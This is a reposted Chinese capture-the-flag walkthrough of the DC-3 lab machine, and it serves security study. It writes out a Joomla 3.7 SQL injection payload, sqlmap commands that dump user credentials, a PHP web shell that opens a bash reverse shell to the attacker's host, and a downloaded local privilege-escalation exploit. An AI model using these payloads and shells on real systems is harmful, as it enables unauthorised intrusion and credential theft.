ICode9

精准搜索请尝试: 精确搜索
首页 > 其他分享> 文章详细

DC-3

2022-05-19 08:31:18  阅读:210  来源: 互联网

标签:1.13 -- fields list DC 192.168 com


信息收集

nmap -A -T4 -p - 192.168.1.13


发现80端口开放 访问

然后对目录进行扫描

dirsearch -u  http://192.168.1.13

image.png
访问发现 REDME.txt image.png
发现是Jomal 3.7 搜索后发现该CMS存在SQL注入漏洞

漏洞利用

Payload:/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(0x23,concat(1,user()),1)


可用,接下来就是用SQLmap跑

sqlmap -u "http://192.168.1.13/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb -Tables


查询 users中的字段

sqlmap -u "http://192.168.1.13/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb -T '#__users' -C name,password,username --dump -p list[fullordering]

得到用户名和密码,但是密码加密方式未知,尝试使用工具John the Ripper破解

成功破解
之前有扫描到后台地址 登录一下

在经过一顿翻找后找到上传点。

这处地方可以新建文件,

然后使用蚁剑连接

新建一个PHP文件,访问就会反弹shell,攻击机先进行监听
内容为

<?php
system("bash -c 'bash -i >& /dev/tcp/192.168.179.128/4444 0>&1' ");
?>

image.png
已经成功获取

使用python反弹shell
python -c 'import pty; pty.spwan("/bin/bash")'

查看系统版本
cat /etc/issue
或者 uname -a

搜索有什么漏洞

对比搜索引擎搜索该版本漏洞,锁定path为39773.txt的漏洞。查看该文件路径
复制到当前目录并查看

cp /usr/share/exploitdb/exploits/linux/local/39772.txt /tmp


下载exp到本地
wget https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39772.zip

然后用蚁剑上传到目标机器

对压缩包进行解压

   unzip 39772.zip
   tar -xvf exploit.tar

image.png
运行脚本
image.png
提权成功
image.png
获得flag

标签:1.13,--,fields,list,DC,192.168,com
来源: https://www.cnblogs.com/vir-k/p/16287183.html

本站声明: 1. iCode9 技术分享网(下文简称本站)提供的所有内容,仅供技术学习、探讨和分享;
2. 关于本站的所有留言、评论、转载及引用,纯属内容发起人的个人观点,与本站观点和立场无关;
3. 关于本站的所有言论和文字,纯属内容发起人的个人观点,与本站观点和立场无关;
4. 本站文章均是网友提供,不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属;如您发现该文章侵犯了您的权益,可联系我们第一时间进行删除;
5. 本站为非盈利性的个人网站,所有内容不会用来进行牟利,也不会利用任何形式的广告来间接获益,纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。

专注分享技术,共同学习,共同进步。侵权联系[81616952@qq.com]

Copyright (C)ICode9.com, All Rights Reserved.

ICode9版权所有